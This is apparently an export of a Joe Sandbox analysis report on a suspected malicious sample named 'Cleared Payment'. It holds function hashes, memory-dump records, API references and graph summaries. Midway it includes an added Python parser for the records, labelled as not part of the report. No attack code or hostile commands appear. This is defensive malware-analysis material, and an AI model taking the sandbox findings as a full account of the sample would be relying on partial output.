                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dbfe4b1ebc6f49c06abe04b7de942702c57d93b98763b7e6f6e6bd5320fe6e5a
                                                            • Instruction ID: 889c85030dd5f2c7572fcc8063b5321efa200b7870c461fe2c6881fc5758b09d
                                                            • Opcode Fuzzy Hash: dbfe4b1ebc6f49c06abe04b7de942702c57d93b98763b7e6f6e6bd5320fe6e5a
                                                            • Instruction Fuzzy Hash: 54214675504384EFDB04DF11D9C0B26BBA1FB85318F20C56DEA098B292C37AE80ACA61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106475309.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8ed000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53516a3a7b376e3d819c7c5d2fc571736511908c3a262f57b7aa1c133ee001a9
                                                            • Instruction ID: 4463e66e75affcd41192b4ad7005490044700ae55e09e0b645d4a5e2f32ae45b
                                                            • Opcode Fuzzy Hash: 53516a3a7b376e3d819c7c5d2fc571736511908c3a262f57b7aa1c133ee001a9
                                                            • Instruction Fuzzy Hash: 77214F755087C49FCB02CF14D994715BF71FB46314F28C5EAD8498B2A7C33A985ACB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106415361.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8dd000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                            • Instruction ID: 92a0db5b1a7b25b2643928c23187e3ce9a5099dda80e96e0bacebcb00eb07860
                                                            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                            • Instruction Fuzzy Hash: 6E11B176504380DFCB15CF10D5C4B16BF71FB94328F24C6AAD8494B656C33AD856CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106475309.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8ed000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction ID: 22fc9bbff55712c26b86e587493594a65213c2b9f107047f812747efb1e57442
                                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction Fuzzy Hash: A711BB79504380DFCB01CF10C6C0B15BBA2FB85314F24C6A9D9498B2A6C33AE80ACB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106415361.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8dd000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8febbb04c05e7e3dbde4c5143323f084797e13c7facbd3da8e817c2d5dfdcb8d
                                                            • Instruction ID: 7bb4767df2b9984be885c1b08131e987a74ec330e8d47426b86ff5e7826cbb58
                                                            • Opcode Fuzzy Hash: 8febbb04c05e7e3dbde4c5143323f084797e13c7facbd3da8e817c2d5dfdcb8d
                                                            • Instruction Fuzzy Hash: DD01F7714053449AE7104E26CDC4B26BF98FF41324F18C69BED098A386C6799840CAB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106415361.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8dd000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b8bbf3ea59e452f14f3835f18781553003e25153a02dd14735c9199e37f45b06
                                                            • Instruction ID: d9e7b5fff0c7215ea1512adaebc243450edfc1d07bff51c61c18f3b7ea8aa27a
                                                            • Opcode Fuzzy Hash: b8bbf3ea59e452f14f3835f18781553003e25153a02dd14735c9199e37f45b06
                                                            • Instruction Fuzzy Hash: C8F062714053449AE7108E16D9C4B62FF98EB91734F18C59BED0C4A286C2799844CBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2818b31c7fb479b32096d39be5518bec608ac96cd0dc18c120cf8544e16167b
                                                            • Instruction ID: 46ff34b2f0077994923b99543dc4ce6ba83b914860bdde8e94bd04844451c959
                                                            • Opcode Fuzzy Hash: b2818b31c7fb479b32096d39be5518bec608ac96cd0dc18c120cf8544e16167b
                                                            • Instruction Fuzzy Hash: A712A6B2C917658BD710CF65E96C1893BB1BB41328BD04A19D2611F2E1F7B4126EEF4C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2114625888.0000000008600000.00000040.00000800.00020000.00000000.sdmp, Offset: 08600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8600000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c5f01318bcdf405066c72946bebbb5e4f33d1c597b9b9838faa8795cf36d8e7a
                                                            • Instruction ID: b5677872a337147d055e5282cd54494642944042f06e255beb31ee0fa6790bd1
                                                            • Opcode Fuzzy Hash: c5f01318bcdf405066c72946bebbb5e4f33d1c597b9b9838faa8795cf36d8e7a
                                                            • Instruction Fuzzy Hash: 55D10671910A5ACADB04EB64D990A99B7B1FFD5300F10D79AE00977221FBB06EC9CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2114625888.0000000008600000.00000040.00000800.00020000.00000000.sdmp, Offset: 08600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8600000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f822c9107f7b6d8591b45b8cc554e030b735e786be81b2013bb7b0e3ab2368a
                                                            • Instruction ID: a2c204b2dc746bd388fe72427db23c8a25dc10341d67968504727f3c4d1b3279
                                                            • Opcode Fuzzy Hash: 7f822c9107f7b6d8591b45b8cc554e030b735e786be81b2013bb7b0e3ab2368a
                                                            • Instruction Fuzzy Hash: DBD1F671920A5ACADB04EB64D950A99B7B1FFD5300F10D79AE40937221FBB06EC9CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2112557128.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4b60000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e82e2f8fd20ab5420eed5df485fc908739aa4ccb365493c2ace3f99bd9f33c41
                                                            • Instruction ID: 2543495bc261ac51235fb1eb2f833a64aa045840c5059c4092ffca40002f23ef
                                                            • Opcode Fuzzy Hash: e82e2f8fd20ab5420eed5df485fc908739aa4ccb365493c2ace3f99bd9f33c41
                                                            • Instruction Fuzzy Hash: E3A16D32E0021A8FCF16DFA5C84459EB7F2FF84300B1545AAE806AB265DB75E956CF80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e35cb6e82a2c093e96f103f2785c65d51b519616a06af43a2cf6b3b926c46773
                                                            • Instruction ID: 3c77130fddb14e98e283fed1f009df66aca54e3b659df165130664c62d888d98
                                                            • Opcode Fuzzy Hash: e35cb6e82a2c093e96f103f2785c65d51b519616a06af43a2cf6b3b926c46773
                                                            • Instruction Fuzzy Hash: 7BC13CB1C917658BD710CF25E8681893BB1BB84324FD04B19D1612F2E0FBB4226EEF48
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
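                                                            The function records above all follow one fixed layout (APIs, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity, Uniqueness), which makes them easy to turn into structured data for pivoting, for example to list every API reference per dumped memory region or to find which dump a given fuzzy hash came from. The parser below is an added example and is not part of the Joe Sandbox report or of Joe Sandbox itself; the record layout is taken from this page, three of the records above are embedded as the sample input, and the function and class names are this example's own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Sample input: three function records copied from the report above
# (two with API references, one without), embedded so the parser runs offline.
SAMPLE = """\
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0253C101,00000800,00000000,00000000), ref: 0253C2F2
Memory Dump Source
• Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: e48911565cd9ebb8470b07bf7557c76129fe0271019f49ff6b7207d59bf2b26a
• Instruction ID: 7aeff4f90323b11ca629fc3a03026be1733a32d608ba821a6ba7f58e2a1d0626
• Opcode Fuzzy Hash: e48911565cd9ebb8470b07bf7557c76129fe0271019f49ff6b7207d59bf2b26a
• Instruction Fuzzy Hash: 041114B6C003498FDB10CF9AC484ADEFBF4FB98714F10852AE559A7200C3B5A545CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0253C086
Memory Dump Source
• Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 8dcf1c9780a5c9c3ee28e9a8fbfa16f5f97ba947eff146c408b99218436095e9
• Instruction ID: f61c249acf9f7708664fc30d842f6f5e26421c10f3215757cd41afb6795cfaa2
• Opcode Fuzzy Hash: 8dcf1c9780a5c9c3ee28e9a8fbfa16f5f97ba947eff146c408b99218436095e9
• Instruction Fuzzy Hash: 4F110FB6C003498FCB10CF9AC484BDEFBF4BB88624F10856AD418B7210C3B9A545CFA5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2106415361.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8dd000_Cleared Payment.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fa58aca9ab0f345a2ce2a0f830c1cba9a4ddf3421a1662ff965ad9cec640d6b3
• Instruction ID: 1f8808f790f84327f90c4b57c0ba7bf6c6f6456fc52f406b9c66fd476595f0e5
• Opcode Fuzzy Hash: fa58aca9ab0f345a2ce2a0f830c1cba9a4ddf3421a1662ff965ad9cec640d6b3
• Instruction Fuzzy Hash: 5821C472504344EFDB15DF14E9C0B26BF75FB84318F24C66AD9094A356C336D856CAA1
Uniqueness

Uniqueness Score: -1.00%
"""


@dataclass
class ApiRef:
    """One '• Api.Module(args), ref: addr' line from the APIs section."""
    name: str
    module: str
    args: Tuple[str, ...]
    ref: int


@dataclass
class FunctionRecord:
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    snapshot: str = ""
    fields: Dict[str, str] = field(default_factory=dict)   # Similarity key/values
    apis: List[ApiRef] = field(default_factory=list)
    uniqueness: Optional[float] = None


# The bullet is optional so exports that drop it still parse.
BULLET = r"^(?:•\s*)?"
API_RE = re.compile(BULLET + r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SOURCE_RE = re.compile(BULLET + r"Source File:\s*(?P<file>[^,]+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
FIELD_RE = re.compile(BULLET + r"(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?[0-9.]+)%")
SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text into records; a 'Uniqueness Score' line closes a record.
    Lines outside the known sections (control-flow graph residue, legends) are ignored,
    and a record cut off before its score line is dropped rather than half-filled."""
    records: List[FunctionRecord] = []
    cur = FunctionRecord()
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SCORE_RE.match(line)
        if m:
            cur.uniqueness = float(m.group("score"))
            records.append(cur)
            cur, section = FunctionRecord(), None
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                raw_args = m.group("args")
                args = tuple(a.strip() for a in raw_args.split(",")) if raw_args else ()
                cur.apis.append(ApiRef(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(line)
            if m:
                cur.source_file = m.group("file").strip()
                cur.offset = int(m.group("off"), 16)
                cur.based_on_pe = m.group("pe") == "true"
        elif section == "Joe Sandbox IDA Plugin":
            m = FIELD_RE.match(line)
            if m and m.group("key") == "Snapshot File":
                cur.snapshot = m.group("val").strip()
        elif section == "Similarity":
            m = FIELD_RE.match(line)
            if m:
                cur.fields[m.group("key")] = m.group("val").strip()
    return records


def api_index(records: List[FunctionRecord]) -> Dict[str, List[int]]:
    """API name -> sorted list of call-site addresses across all records."""
    index: Dict[str, List[int]] = {}
    for rec in records:
        for api in rec.apis:
            index.setdefault(api.name, []).append(api.ref)
    return {name: sorted(refs) for name, refs in sorted(index.items())}


def apis_by_region(records: List[FunctionRecord]) -> Dict[int, List[str]]:
    """Dump base offset -> sorted, de-duplicated API names seen in that region."""
    regions: Dict[int, set] = {}
    for rec in records:
        regions.setdefault(rec.offset, set()).update(a.name for a in rec.apis)
    return {off: sorted(names) for off, names in regions.items()}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(f"{rec.offset:08X} {rec.fields.get('API ID') or '-':<14} {[a.name for a in rec.apis]}")
    print(api_index(recs))
    print({f"{off:08X}": names for off, names in apis_by_region(recs).items()})
```

                                                            Feed the whole report text to parse_records to get every record; the two helpers then answer the usual triage questions (which dumped region calls LoadLibraryExW, where the DuplicateHandle call sites are) without scrolling through the records by hand.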

                                                            Execution Graph

                                                            Execution Coverage:10.7%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:144
                                                            Total number of Limit Nodes:14
                                                            Execution graph (rendered graph not preserved in this export). Entry nodes: 6ba2e08, 2bc0848, 138d030, 6ba3050, 6bad510. API calls reached: GetCurrentProcess, GetCurrentThread and GetCurrentThreadId (from 6ba2e08); GlobalMemoryStatusEx, LoadLibraryExW and GetModuleHandleW (from 2bc0848); CallWindowProcW (from 138d030); DuplicateHandle (6ba3050); CreateWindowExW (from 6bad510).

                                                            Control-flow Graph

                                                            Control-flow graph of the function starting at 6bb55a8 (basic blocks 6bb55a8-6bb5cd2; block edge list omitted; no API calls appear in this graph).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $
                                                            • API String ID: 0-3993045852
                                                            • Opcode ID: b2bcbcac6b2becaf18c3cbb90d3867779c73c53174b87cc146cbc1a18160dadd
                                                            • Instruction ID: 8a7f47d6d7181e1129969045a5465e7421653796fa3de04338198281afb23588
                                                            • Opcode Fuzzy Hash: b2bcbcac6b2becaf18c3cbb90d3867779c73c53174b87cc146cbc1a18160dadd
                                                            • Instruction Fuzzy Hash: BB2291B2F002558FDB74DFA4D4806EEB7B2EF85310F24A4A9D446AB344DAB5DC42CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b48cde139ef910e5dc0fe376856e9447d07af888e19e5c52c938a6e6e344adcd
                                                            • Instruction ID: e4ef045eb53700cda9ecfb73ab0251f8d456b42d769b1855d14c84019ad86ff3
                                                            • Opcode Fuzzy Hash: b48cde139ef910e5dc0fe376856e9447d07af888e19e5c52c938a6e6e344adcd
                                                            • Instruction Fuzzy Hash: 9A629F70B002058FDB64DB68D584AEDB7F2EF88314F54A4A9D406DB394EBB5ED41CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cd7eee9b5961b077f1f4ac3410db6b2557b8495ebefc5cbbc06f0522e3f948e
                                                            • Instruction ID: 817e39a9590842dd482028c455b6164e80667cdedce517eb729a6db467b921fc
                                                            • Opcode Fuzzy Hash: 4cd7eee9b5961b077f1f4ac3410db6b2557b8495ebefc5cbbc06f0522e3f948e
                                                            • Instruction Fuzzy Hash: 3F329471F102058FDB54EB68D880BAEBBB2FB88314F10A569D506EB355DBB4EC41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8e79d804bdacaeaacdd81b9135a8e26a98375f863679ffc2d9e0591940aa2ff
                                                            • Instruction ID: b6ed22d8a57e92bb9be3f84a592fbcb7bd3334b78f682e3471553161a8916448
                                                            • Opcode Fuzzy Hash: a8e79d804bdacaeaacdd81b9135a8e26a98375f863679ffc2d9e0591940aa2ff
                                                            • Instruction Fuzzy Hash: 69227FB0E101098BEF64DA68D8907FDBBA2FB85310F60A56AD445DB392DEB4DC818B51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be9dfdee74bceb3310a62bd60abe3e1c0d7274052c9ec4974f2219b4a9bdc5df
                                                            • Instruction ID: e5c3ba8b22babd01944fa1261a71d13f9b0c57d77d9bfbe1dcaf27fedcdce65c
                                                            • Opcode Fuzzy Hash: be9dfdee74bceb3310a62bd60abe3e1c0d7274052c9ec4974f2219b4a9bdc5df
                                                            • Instruction Fuzzy Hash: DB323231E1065ACFDB14EF75C8905ADB7B2FFD9300F1096AAD409AB254EF70A985CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329832820.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bb0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f377cd386ece0888f4a4a7dcf7d614f3f5b886864cb48145a2b9fe62e6dba7c
                                                            • Instruction ID: a761c397e3df4d6a4fcaeda40d739be3f837ba9be7870ae6f5fe3204426fa952
                                                            • Opcode Fuzzy Hash: 1f377cd386ece0888f4a4a7dcf7d614f3f5b886864cb48145a2b9fe62e6dba7c
                                                            • Instruction Fuzzy Hash: 1A02B170B012168FDB64DF68D8906AEB7E6FF84300F149569E406DB384DBB5EC42CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 06BA2E86
                                                            • GetCurrentThread.KERNEL32 ref: 06BA2EC3
                                                            • GetCurrentProcess.KERNEL32 ref: 06BA2F00
                                                            • GetCurrentThreadId.KERNEL32 ref: 06BA2F59
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 923f98b65a1fc5225c0665524bdaaa03c541afac2213c49503152e3a7cee7321
                                                            • Instruction ID: 8eaf76452ac99cd5fe6fa696cdefcb41e79d728c62c133a6a431cc687022dd5d
                                                            • Opcode Fuzzy Hash: 923f98b65a1fc5225c0665524bdaaa03c541afac2213c49503152e3a7cee7321
                                                            • Instruction Fuzzy Hash: 785165B190430A8FDB94DFA9D948BDEBBF1FF88314F24805DE009A7250DB756944CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 06BA2E86
                                                            • GetCurrentThread.KERNEL32 ref: 06BA2EC3
                                                            • GetCurrentProcess.KERNEL32 ref: 06BA2F00
                                                            • GetCurrentThreadId.KERNEL32 ref: 06BA2F59
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 77aa91de72132830ba82c6eb833f22c7e3ce7df5f72e4a8be8a8ea3fb001dcc4
                                                            • Instruction ID: f7f044b1687d95e718af1996aea1b45771ecf0d3ae88030f525f1ab7fe31af82
                                                            • Opcode Fuzzy Hash: 77aa91de72132830ba82c6eb833f22c7e3ce7df5f72e4a8be8a8ea3fb001dcc4
                                                            • Instruction Fuzzy Hash: 5B5165B190030A8FDB94DFA9D948B9EBBF1FF88314F24805DE009A7250DB756940CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Control-flow graph of the function starting at 6bab318 (basic blocks 6bab318-6bab5c0; block edge list omitted). Calls in this graph: 6baa28c, 6bab5bd / 6bab5c0, 6baa298, 6ba396c, 6ba81fc, 6baa2a8 and GetModuleHandleW.
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06BAB57E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 4dc839566b5c17480e81589e2911ef74862fc6457bd9ee3070b3bb4cc291f0ce
                                                            • Instruction ID: c234115a1d1dfc2a1dad32c77649f64427bca8a9e1468d18fb021a648ed4e555
                                                            • Opcode Fuzzy Hash: 4dc839566b5c17480e81589e2911ef74862fc6457bd9ee3070b3bb4cc291f0ce
                                                            • Instruction Fuzzy Hash: F78158B0A04B058FD7A4DF2AD49075ABBF1FF88304F008A6ED496D7A50DB75E845CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Control-flow graph of the function starting at 2bcea58 (basic blocks 2bcea58-2bcebe5; block edge list omitted). Calls in this graph: 2bce1d0 and GlobalMemoryStatusEx.
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3325348851.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2bc0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83d71d50c34a34a3e5f3144d8015007d5ce928989bd3e1d3bc1e525e9103c3c1
                                                            • Instruction ID: a916e2a836fec7ee6809992697c79d24ba239cbf28555525349bd372a86a3eab
                                                            • Opcode Fuzzy Hash: 83d71d50c34a34a3e5f3144d8015007d5ce928989bd3e1d3bc1e525e9103c3c1
                                                            • Instruction Fuzzy Hash: CA412772E0439A8FCB14DF69D8403AEBBF5AFC9210F1485AAD504E7341EB749845CBD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Control-flow graph of the function starting at 6bad507 (basic blocks 6bad507-6bad681; block edge list omitted). API call in this graph: CreateWindowExW.
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BAD622
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 90e20cb4a6af7089cc8c6ed926867ff77d1e30e65e973109345aca8b8a057e44
                                                            • Instruction ID: 000eda0f904ba6d6363caf24bdd5c48926e3d12e92b268568c6a0d71320e2dd1
                                                            • Opcode Fuzzy Hash: 90e20cb4a6af7089cc8c6ed926867ff77d1e30e65e973109345aca8b8a057e44
                                                            • Instruction Fuzzy Hash: E451BEB1D043499FDB14CF99C884ADEBFB5FF48310F64866AE819AB210D771A885CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Control-flow graph of the function starting at 6bad510 (basic blocks 6bad510-6bad681; block edge list omitted). API call in this graph: CreateWindowExW.
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06BAD622
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.3329788953.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6ba0000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: fef0d29823e5655368e3c3c1e5a1d9b4a13a074e8c3816a6e56fcaa6ccf2bc71
                                                            • Instruction ID: d613c5a5e32f8faa94ff3991881a6f08a2e833d588e132ed907a885a60e6b936
                                                            • Opcode Fuzzy Hash: fef0d29823e5655368e3c3c1e5a1d9b4a13a074e8c3816a6e56fcaa6ccf2bc71
                                                            • Instruction Fuzzy Hash: 3241B0B1D04349DFDB14CF99C884ADEBBB5FF48310F24866AE818AB210D775A885CF90
                                                            Uniqueness

